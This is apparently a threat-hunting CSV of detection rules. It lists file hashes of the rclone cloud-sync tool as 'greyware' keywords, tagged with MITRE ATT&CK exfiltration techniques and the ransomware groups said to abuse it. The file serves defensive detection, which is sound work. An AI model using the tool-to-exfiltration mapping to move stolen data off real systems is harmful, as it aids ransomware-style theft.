"*2ac10f7ff25fac8a1d34f54b0b87bf14de6ae482dc2691fd273702971dd61704*",".{0,1000}2ac10f7ff25fac8a1d34f54b0b87bf14de6ae482dc2691fd273702971dd61704.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*2ac214f54f3286db611d416155cb40569f6932fdb45a1e384dac201c5f41a9ff*",".{0,1000}2ac214f54f3286db611d416155cb40569f6932fdb45a1e384dac201c5f41a9ff.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*2ac5bb5e54dcd346f6ede08e1b380127ee89d879a2336ef6f6c296cf378a0c86*",".{0,1000}2ac5bb5e54dcd346f6ede08e1b380127ee89d879a2336ef6f6c296cf378a0c86.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*2acd831051f89004586e5e59b33bf951f338671697def433d22b6c3c5ba0cde6*",".{0,1000}2acd831051f89004586e5e59b33bf951f338671697def433d22b6c3c5ba0cde6.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*2ae5e02519c7da40c09e81ab02be9151336872b3f65cb39a917d53fa742d9241*",".{0,1000}2ae5e02519c7da40c09e81ab02be9151336872b3f65cb39a917d53fa742d9241.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*2b0898db6823fb2d533e7f7f1dbc19ec25ccd87f552b19e046ebcbf13c0efe3c*",".{0,1000}2b0898db6823fb2d533e7f7f1dbc19ec25ccd87f552b19e046ebcbf13c0efe3c.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*2b13ba11cc9a18e558083ee33b7694fd4f1977bff70fd253687757fc92079ff6*",".{0,1000}2b13ba11cc9a18e558083ee33b7694fd4f1977bff70fd253687757fc92079ff6.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*2b44981a1a7d1f432c53c0f2f0b6bcdd410f6491c47dc55428fdac0b85c763f1*",".{0,1000}2b44981a1a7d1f432c53c0f2f0b6bcdd410f6491c47dc55428fdac0b85c763f1.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*2b5b31aa845de53f3410b452a02bd47d83e4358c53c6e7ae71c4e83386ef690f*",".{0,1000}2b5b31aa845de53f3410b452a02bd47d83e4358c53c6e7ae71c4e83386ef690f.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*2b8d5092b61c3a87ff79a8a23999f1ad4e58735a7a6ca4b0ca046b3be30a4880*",".{0,1000}2b8d5092b61c3a87ff79a8a23999f1ad4e58735a7a6ca4b0ca046b3be30a4880.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*2b9b335b2e741aa07e730558f6d27d4a5c4a2722817de67fcfebfcc5ee463bc0*",".{0,1000}2b9b335b2e741aa07e730558f6d27d4a5c4a2722817de67fcfebfcc5ee463bc0.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*2ba4fae01c0be9c2a3dd365ad2cf3f4c58bb596b007533e2512c400f3be408df*",".{0,1000}2ba4fae01c0be9c2a3dd365ad2cf3f4c58bb596b007533e2512c400f3be408df.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*2bae86030b8915d8278720c4d3fe1ea3aa9f414575f38d0a66ecce3906cb6d2d*",".{0,1000}2bae86030b8915d8278720c4d3fe1ea3aa9f414575f38d0a66ecce3906cb6d2d.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*2bb962d810bd4b823e5ed4879ce64277f177aaa60171b8d1a56d613f41837304*",".{0,1000}2bb962d810bd4b823e5ed4879ce64277f177aaa60171b8d1a56d613f41837304.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*2bcebbbf1b206309ff012a43cac85378ac6ff60a6c22b623264a9ff27053ca11*",".{0,1000}2bcebbbf1b206309ff012a43cac85378ac6ff60a6c22b623264a9ff27053ca11.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*2bd3723b237f9162350b45702b8bb7bf540250a6b73639dd6813c010c17b276a*",".{0,1000}2bd3723b237f9162350b45702b8bb7bf540250a6b73639dd6813c010c17b276a.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*2bdc646422d0272aca1568c176b0510d965bfe8e266afbbfa713683dece33d65*",".{0,1000}2bdc646422d0272aca1568c176b0510d965bfe8e266afbbfa713683dece33d65.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*2be05696ee5c448599221347dbd3e2305b0a1593bc89d27a518fd9e17728ae62*",".{0,1000}2be05696ee5c448599221347dbd3e2305b0a1593bc89d27a518fd9e17728ae62.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*2be56ec4a77c58c8aba5a16b91482e088c87d947f4cb2c9ab0a64be782048cd7*",".{0,1000}2be56ec4a77c58c8aba5a16b91482e088c87d947f4cb2c9ab0a64be782048cd7.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*2be9772e3bec3a363b29f016e167a8c32e49ad64a2fb73b37368c33243e0e27d*",".{0,1000}2be9772e3bec3a363b29f016e167a8c32e49ad64a2fb73b37368c33243e0e27d.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*2bf61eef4890074ccbfb46cca83d6885557d37e7a2a42afe4a37e508dd3266e5*",".{0,1000}2bf61eef4890074ccbfb46cca83d6885557d37e7a2a42afe4a37e508dd3266e5.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*2c8cf42e378bb18c5ecaaf8deb11a5eb6bf684e849ac2b931ee6e5c3afb5bec7*",".{0,1000}2c8cf42e378bb18c5ecaaf8deb11a5eb6bf684e849ac2b931ee6e5c3afb5bec7.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*2cade8a207e1fe8a8f21640a14762bcf57b33526c1b70a6a0cc7147ad428f587*",".{0,1000}2cade8a207e1fe8a8f21640a14762bcf57b33526c1b70a6a0cc7147ad428f587.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*2cd4ff8ae7df9bd0433fbed59dacceabe0334b725aad2dc615251f88b7eca9c5*",".{0,1000}2cd4ff8ae7df9bd0433fbed59dacceabe0334b725aad2dc615251f88b7eca9c5.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*2ce120a7d253c6601c608c5ee29690ac2a329b2ea108db0bca609946dac032eb*",".{0,1000}2ce120a7d253c6601c608c5ee29690ac2a329b2ea108db0bca609946dac032eb.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*2d01ced5976ff2524383076dffd3c5ab59dfd2897b00f3e8a3e7ac9dc79312ec*",".{0,1000}2d01ced5976ff2524383076dffd3c5ab59dfd2897b00f3e8a3e7ac9dc79312ec.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*2d01e46b4831591ff917c231cd72595b0652c2ce36272111418a5e858c28cb71*",".{0,1000}2d01e46b4831591ff917c231cd72595b0652c2ce36272111418a5e858c28cb71.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*2d4087276e9e72db9ed380898ea8e5342dfdbd049642c8be95ac655cb866cfa2*",".{0,1000}2d4087276e9e72db9ed380898ea8e5342dfdbd049642c8be95ac655cb866cfa2.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*2d92293177da319e9cf294c97e6fcc9d32bb2646d1e1dc0129fb02d5c30fbf12*",".{0,1000}2d92293177da319e9cf294c97e6fcc9d32bb2646d1e1dc0129fb02d5c30fbf12.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*2da66cfdc6cd351b8c29f04d19ff53de4e12a8893ca902e09f946a2df7eefbb7*",".{0,1000}2da66cfdc6cd351b8c29f04d19ff53de4e12a8893ca902e09f946a2df7eefbb7.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*2db3eb786f155f3eae64e0f3af00a3c3f417f257c80733b4b0cdd01991041ba1*",".{0,1000}2db3eb786f155f3eae64e0f3af00a3c3f417f257c80733b4b0cdd01991041ba1.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*2df0d687e0626898fdb0f52f665e8e413f063fe1c5088d4fb26d07284a43de35*",".{0,1000}2df0d687e0626898fdb0f52f665e8e413f063fe1c5088d4fb26d07284a43de35.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*2e3f38fe1955a659f09a14d2c8b1fe2b242972e65a305f7fddf8c7f2d619f460*",".{0,1000}2e3f38fe1955a659f09a14d2c8b1fe2b242972e65a305f7fddf8c7f2d619f460.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*2ea3ba0640d7202718bd5d6a00c1db2a3c09e3cf1e9d2ca2247a12dbbc4b1a44*",".{0,1000}2ea3ba0640d7202718bd5d6a00c1db2a3c09e3cf1e9d2ca2247a12dbbc4b1a44.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*2effa3692c2567b15931e21ad84374cbfbffca84aec823bbb190f492b062a2ef*",".{0,1000}2effa3692c2567b15931e21ad84374cbfbffca84aec823bbb190f492b062a2ef.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
